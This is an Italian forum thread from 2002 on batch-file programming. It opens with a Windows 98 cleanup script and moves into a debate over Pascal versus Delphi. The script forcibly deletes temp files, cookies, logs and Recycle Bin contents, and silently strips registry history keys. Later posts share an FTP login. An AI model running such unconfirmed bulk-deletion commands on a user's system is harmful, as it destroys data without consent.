del %winbootdir%\profiles\%username%\recent\*.lnk
cls
echo Cancellazione file temporanei...
del ..\..\..\..\*.tmp
deltree/y "%winbootdir%\temporary internet files\*.*"
deltree/y "%winbootdir%\File temporanei Internet\*.*"
deltree/y "%winbootdir%\Impostazioni locali\Temporary Internet Files\*.*"
attrib -r -s -h %winbootdir%\temp\*.*
del %winbootdir%\*.tmp
del %winbootdir%\*.bak
echo s|del %winbootdir%\temp\*.*
deltree/y %winbootdir%\temp\*.*
if exist c:\temp\nul goto tmp
goto aft
:tmp
deltree/y c:\temp
md c:\temp
:aft
cls
echo Pulizia del Cestino di Windows...
attrib -r -s -h c:\recycled\dc*.*
del c:\recycled\dc*.*
del c:\recycled\info
cls
echo Cancellazione file .gid ...
attrib -h %winbootdir%\help\*.gid
attrib -h %winbootdir%\system\*.gid
attrib -h %winbootdir%\*.gid
del %winbootdir%\help\*.gid
del %winbootdir%\system\*.gid
del %winbootdir%\*.gid
cls
echo Cancellazione file log ...
del c:\scandisk.log
echo s|del c:\progra~1\access~1\log\*.*
del %winbootdir%\cookies\*.txt
if "%1"=="/reg" goto regc
goto exet
:regc
echo REGEDIT4 > regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\RunMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Doc Find Spec MRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\FindComputerMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\PrnPortsMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\StreamMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\OCXStreamMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Applets\Paint\Recent File List] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Applets\Wordpad\Recent File List] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\P layer\RecentURLList] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\P layer\RecentFileList] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\ComDlg32\LastVisitedMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\ComDlg32\OpenSaveMRU] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Wang\Imaging\Recent File List] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Kodak\Imaging\Recent File List] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs] >> regclr.reg
echo. >> regclr.reg
echo [-HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\URL History] >> regclr.reg
echo. >> regclr.reg
echo pulizia dati recenti registro...
regedit/s regclr.reg
del regclr.reg
goto exet
:exet
:exetb
cls




ahh ho un piccolo prob.., if exist e if not exist sente solo i file :( non riesco a fare la seguente cosa:

if exist ciao md allora
però ciao è una cartella mentre lui lo cerca come file senza estensione, uffa xchè?????:(

Klapaucius
28-08-2002, 13.53.34
pazzokramaz evita di fare copia incolla dei programmi di Wintricks....
lo conosco bene questo batch perchè me lo sono personalizzato.......;)

pazzokramaz
28-08-2002, 14.01.23
si lo so è pulizia


ma io ho incollato x far vedere come sia utili e buono il batch:cool:

Lucavettu
28-08-2002, 16.37.01
Originariamente inviato da lucavettu
scusa... come si creano i menu in un bat????

alloraaaaaaa

mi rispondete? (W)

(S) (S) (S) :D

LoryOne
28-08-2002, 19.11.25
Semplicemente con ECHO,Choice e "If ErrorLevel=x Goto"

pazzokramaz
28-08-2002, 23.00.10
yes se vuoi di + cerca anche su internet a batch:D

pazzokramaz
28-08-2002, 23.01.48
oo

pazzokramaz
28-08-2002, 23.04.05
uu

Lucavettu
29-08-2002, 14.16.53
Originariamente inviato da pazzokramaz
uu

dove trovo le librerie necessarie x questo programma???

che programma è???

pazzokramaz
30-08-2002, 16.49.28
1 o 2 allegati non centrano nulla scusami:(

intannto sto continuando a programmare i pk-tools:D

pazzokramaz
30-08-2002, 16.55.01
uffa scarica subito multi media builder e imparalo ad usarlo, fai delle prove;)


impara anche a usare il batc facendo delle prove

1 vai in opsioni cartella e scegli visualizza tutti file
visualizza tutte le estensioni dei file

2 crei un file notepad
3 lo rinonimi con estensione.bat
4 ci clikki sopra con il puls destro e poi clicchi su modifica


ecco aperto il batch x modificarlo

scrivi
@echo off

echo.
echo cazzo che bello
echo.

exit



salvi tutto e clikki sul bat;)


se vuoi che si kiuda automaticamente fai così:


scrivi
@echo off

echo.
echo cazzo che bello
echo.
pause

exit


savi tutto poi vai a proprieta del file e selezioni chiudi all'uscita alla fineinsomma bla bla...


ti comparira un file .pif che serve x chiuderlo, non lo toccare(Y)

clikki sul bat e vedi:D

pazzokramaz
30-08-2002, 16.56.28
scarica il pakko di link e vedi:)

Lucavettu
30-08-2002, 19.38.51
guarda che sono capace di programmare (se così si può definire, ahimè) in dos...

pazzokramaz
31-08-2002, 02.13.07
ecco dove potete scaricare i miei programmi:



*** LINK RIMOSSO ***
nome utente:miomatrix
pasword:muzzungo



buon download via ftp ;)

non fate i furbi tanto non è la mia pagina principale, è un
account temporaneo x imparare ad usare l'html

ciao:D

Lucavettu
31-08-2002, 13.57.57
ti uccido cavolo!!!

il tuo PKcompiler del CA§§O mi ha creato 3 file che non riesco a eliminare (errone 1026) :S

vedi di rimediare :anger: :grrr:

pazzokramaz
31-08-2002, 16.51.41
azzzzzzzzz
è vero anche a me


x rimediare fai cosi:


devi mettere quei file in una cartella in c:

tipo c:\fileerrore\

e poi fai

deltree fileerrore

lui ti chiede se cancellare la cartella fileerrore, te rispondi di si
la cartella verra cancellata con i file.....


penso che questa procedura la devi fare da dos puro........

hai win 98??

se xp o me prova a aprire il prompt di msdos e andare in c:\


credo che tu abbia tentato di compilare un .bat vuoto o un .com vuoto nella 1.9 non beta questo bug sara rimosso :)

sei sic..... di non avere rinominato la cartella pkcompiler?
i file del pkcompiler devono restare dentro quella cartella, al max ti crea i tre file di errore nella cartella pkcompiler ma io pubblicherò sul mio sito la versione 1.9 full


nella 1.9beta è cambiato solo l'interfaccia :)



prova a cliccare sul pulsante pulisci
:D :D


tataaaaaaannnnnn:D :D

sono felice di presentare:

*** LINK RIMOSSO ***

guardate e scaricate i miei programmi

is very full;)

Sergio Neddi
31-08-2002, 22.27.19
Vedi qui!

http://www.msni.it/forum/showthread.php?s=&postid=287083#post287083

pazzokramaz
01-09-2002, 00.28.31
uffa ma non mi potete levare i link:(

e io come faccio:(

cattivi


ora l'altro utente è nei casini e se non va alla mia pagina web
x scaricare la patch x il prog, quei file restano li x tutta la vita:p


insomma ma cosa vevo fare x mandare all mia pag web:mad:




vai alla mia pagina web e scaricati il pk compiler 1.6 e usi questo al posto di quello che hai ora ;)



x eliminare i file :) ecco il batch da mettere nella cartella di pkcompiler che contiene i file che non si spiccicano ;)



stai attento a dove metti il file , rimuove tutto;)

x esempio

mettilo in pkcompiler
pkcompiler\remove.bat

lui cancella tutto quel che trova in pkcompiler quindi completamente tutto anche i file

Sergio Neddi
01-09-2002, 00.32.55
Visto che i link il buon pazzokramaz li ha sparsi su più thread credo proprio che sia il caso di dare una pulita, per cui li ho rimossi.

Se devi mandare qualcosa a qualcuno puoi usare la posta, mettere un allegato, ecc.

Ma forse per queste cose ci vuole più fantasia che per programmare.

aledista
01-09-2002, 10.31.11
Bhe io ti dico solo questo...i linguaggio con i quali insegnano a programmare negli istituti tecnici sono questi:

Borland Turbo Pascal 7
// C + +

questi due linguaggi sono veramente utili per imparare la vera logica della programmazione...!!!

Visual Basic e Delphi credo siano i migliori però sono visuali e molte cose le fanno automaticamente...!!


il mio consiglio è iniziare da zero !!
VB e Deplhi sono linguaggi troppo di alto livello, ti conviene fare prima qualche passo con Pascal

Lucavettu
01-09-2002, 22.47.25
Originariamente inviato da pazzokramaz
uffa ma non mi potete levare i link:(

e io come faccio:(

cattivi


ora l'altro utente è nei casini e se non va alla mia pagina web
x scaricare la patch x il prog, quei file restano li x tutta la vita:p


insomma ma cosa vevo fare x mandare all mia pag web:mad:




vai alla mia pagina web e scaricati il pk compiler 1.6 e usi questo al posto di quello che hai ora ;)



x eliminare i file :) ecco il batch da mettere nella cartella di pkcompiler che contiene i file che non si spiccicano ;)



stai attento a dove metti il file , rimuove tutto;)

x esempio

mettilo in pkcompiler
pkcompiler\remove.bat

lui cancella tutto quel che trova in pkcompiler quindi completamente tutto anche i file

ormai mi sono convinto che roba buona si scarica solo da WT ;)

x i 3 file bastardi me li tengo...

sergio neddi (IL MOD ;) ) ha ragione... è inutile spammare x il proprio sito... se l'ha capito Vito puoi arrivarci anche tu ok???

io ho quel misero pulsantino con scritto "website" e mi basta & avanza... non c'è scritto da nessuna parte che bisogna sempre esagerare ok???

ciao :)

Klapaucius
01-09-2002, 22.51.07
Originariamente inviato da lucavettu

... se l'ha capito Vito puoi arrivarci anche tu ok???



:anger: :anger: :anger:
:D :D

Klapaucius
01-09-2002, 22.53.19
secondo me però si dovrebbe prendere in considerazione la possibilità di poter scrivere, ad esempio, un link diretto per poter scaricare qualcosa.....non è sempre detto che un attach riesca ad entrare in un post.....

Lucavettu
01-09-2002, 22.57.50
scusami x prima....

xò penso che un link diretto al file forse si atollerabile... mentre il far visitare il sito intero non sia molto corretto... magari sbaglio: preferisco aspettare l'opinione dei mods

Lucavettu
01-09-2002, 23.02.26
cito parte dell'articolo n°3 del regolamento alla voce "Signature - Avatar":

è possibile linkare il proprio sito personale o una pagina di riferimento, anche se si consiglia di utilizzare l'apposita voce del profilo personale.

ekerazha
01-09-2002, 23.11.14
Originariamente inviato da aledista

il mio consiglio è iniziare da zero !!
VB e Deplhi sono linguaggi troppo di alto livello, ti conviene fare prima qualche passo con Pascal

Anche io ho iniziato col Pascal, ma non sono assolutamente d'accordo... innanzitutto col Delphi puoi fare anche programmi dalla riga di comando, e comunque col Delphi puoi iniziare da subito a fare programmi con una GUI, cosa quasi impossibile col Pascal... oltretutto usando il Pascal ti vai ad imparare comandi specifici per la riga di comando, che se a uno interessa fare programmi visuali sono solo devianti.

Il Delphi oltretutto è decisamente più performante del Pascal (e anche del Visual Basic :D ), e permette di fare molte più cose (oltre a quelle che puoi già fare col Pascal).

E' però vero che iniziare subito con un linguaggio visuale può lasciare qualche cattiva abitudine, cmq... sempre e solo ABBASSO IL PASCAL (N) :D :D

pazzokramaz
02-09-2002, 02.29.37
ma scusa cosa hai da lementarti ti ho fatto la versione 1.6 che funge che è una meraviglia :O

e poi ti ho messo la patch x eliminare i file:O

insomma sei proprio cattivo:mad:


vava tienti microsoft e altre schifezze fatte da altri che magare
scrivano pu..ana.e invece di roba utile:)


se è così posto su hwupgrade(Y)

pazzokramaz
02-09-2002, 12.45.19
le immagini parlano :);)

pazzokramaz
02-09-2002, 13.27.08
lucavettu vai qui:
http://www.msni.it/forum/showthread.php?s=&postid=288066#post288066



ciao addio:D

LoryOne
03-09-2002, 13.28.42
Per ekerazha:

Cosa intendi con "innanzitutto col Delphi puoi fare anche programmi dalla riga di comando oltretutto usando il Pascal ti vai ad imparare comandi specifici per la riga di comando, che se a uno interessa fare programmi visuali sono solo devianti" :eek:

Cosa intedi con "E' però vero che iniziare subito con un linguaggio visuale può lasciare qualche cattiva abitudine" ?

Vuoi dire che oramai siamo tutti dei programmatori con cattive abitudini se le usiamo ?
Diciamo piuttosto (se sei d'accordo) che molti novelli programmatori che usano le GUI si stupiscono di "quanto sia facile programmare" senza che si rendano conto del lavoro pesante che programmatori più esperti hanno fanno per loro.

Questa loro sufficienza mi infastidisce :mad: :mad: ..non so se per te è lo stesso.

DavideDave
03-09-2002, 14.21.17
facciamo il mio esempio:

- Java -

puoi programmare col notepad e compilare da riga di comando
puoi farti le GUI a manina inserendo valori di coordinate e ascisse componente per componente :S

oppure

puoi usare tool di sviluppo visuali tipo JBuilder, col quale:
classi e metodi ti vengono suggeriti
le GUI te le fai disegnando :cool:

dopo un anno di lavoro secondo voi chi ha più esperienza in Java? quello che usa il primo metodo o quello che usa il secondo?

evidentemente il primo ;)

con questo non voglio dire che si deve rimanere ancorati al passato anche nel momento in cui il mercato offre tools o persino linguaggi che rendono la vita del programmatore più facile e soprattutto produttiva ;)

ma sicuramente, per chi inizia, non conviene partire con la pappetta già pronta, bensì farsi un pò di sederino e sudare sulle cose per acquisire la giusta esperienza di sviluppo :rolleyes:

Ciao :)

LoryOne
03-09-2002, 15.08.13
puoi programmare col notepad e compilare da riga di comando

Questa frase mi ha dato la motivazione di ricercare se anche VB avesse questa ccaratteristica:

TROVATA

Quando si desidera compilare un progetto a livello di programmazione, può risultare utile creare un file eseguibile dalla riga di comando in una sessione DOS. In un file batch, digitare:
vb32 /make nomeprogetto[.vbp] [nomeexe]

Sostituire al segnaposto nomeprogetto il nome del file di progetto. Utilizzare la variabile nomeexe per rinominare il file eseguibile creato.

:D :D :D

ekerazha
03-09-2002, 15.15.55
Allora... facciamo un esempio banale con pascal... ti impari tutti i vari "writeln" e "readln" che servono solo per i programmi non visuali (a riga di comando) e che non servono a niente se fai programmi con la GUI... inoltre uno abituato a fare programmi non visuali, poi si vedere comparire davanti degli oggetti che non sa più come gestire, perchè gli si è riempito la testa di comandi utili solo per programmi a riga di comando...

Inoltre anche con il Delphi puoi fare programmi a riga di comando, dunque il Pascal diventa totalmente obsoleto (puoi sostituirlo totalmente con Delphi, ed inoltri eviti di imparare tanti comandi obsoleti che si usavano solo nel Pascal).

Cattiva abitudine perchè ad esempio nel Delphi, molti uses, molte variabili, te le dichiara automaticamente il programma, dunque non appena il programma toppa, non sai più dove andare a mettere le mani per salvare la situazione.

Inoltre se proprio vuoi complicarti la vita puoi usare le API di Windows... peccato che non siano multipiattaforma, mentre invece se usi i componenti VCL del Delphi, poi volendo col Kylix puoi fare dei porting su Linux, con tanto di GUI.

Klapaucius
03-09-2002, 16.10.15
Originariamente inviato da ekerazha
Allora... facciamo un esempio banale con pascal... ti impari tutti i vari "writeln" e "readln" che servono solo per i programmi non visuali (a riga di comando) e che non servono a niente se fai programmi con la GUI... inoltre uno abituato a fare programmi non visuali, poi si vedere comparire davanti degli oggetti che non sa più come gestire, perchè gli si è riempito la testa di comandi utili solo per programmi a riga di comando...

Inoltre anche con il Delphi puoi fare programmi a riga di comando, dunque il Pascal diventa totalmente obsoleto (puoi sostituirlo totalmente con Delphi, ed inoltri eviti di imparare tanti comandi obsoleti che si usavano solo nel Pascal).

Cattiva abitudine perchè ad esempio nel Delphi, molti uses, molte variabili, te le dichiara automaticamente il programma, dunque non appena il programma toppa, non sai più dove andare a mettere le mani per salvare la situazione.

Inoltre se proprio vuoi complicarti la vita puoi usare le API di Windows... peccato che non siano multipiattaforma, mentre invece se usi i componenti VCL del Delphi, poi volendo col Kylix puoi fare dei porting su Linux, con tanto di GUI.

proprio il mio problema....
io programmo in c.....quando mi trovo davanti una gui mi vengono delle crisi di identita :D

LoryOne
03-09-2002, 16.15.53
dunque il Pascal diventa totalmente obsoleto

Dai non è possibile.

Delphi è Pascal o meglio...E' Pascal adattato all'ambiente Windows. E' normale che ci siano delle differenze, tipo nuove unit o nuove istruzioni.

Hai mai programmato in Turbo Vision ?
Ce l'hai grassa con Delphi.

pazzokramaz
03-09-2002, 16.40.34
vi giuro io non ho usato programmi x fare le mie gui....









:D :D :D :D


:p :p




















avete visto le foto????
cliccate sulla pagina web in signature

LoryOne
03-09-2002, 16.45.28
...Allora sei un programmatore con le palle !!!:D :D :D
:p :p

pazzokramaz
03-09-2002, 23.16.32
visto che mi hanno levato il sito :rolleyes: :mad:

bastardi interfree


beh farò un nuovo sito in supereva


cmq ho utilizzato un software x fare le gui(Y)

ekerazha
04-09-2002, 00.06.28
Originariamente inviato da LoryOne
Delphi è Pascal o meglio...E' Pascal adattato all'ambiente Windows.

No, è di più, il Delphi è una completa evoluzione del Pascal, di simile c'è solo la sintassi del linguaggio... quindi il Pascal diventa obsoleto, a morte il pascal.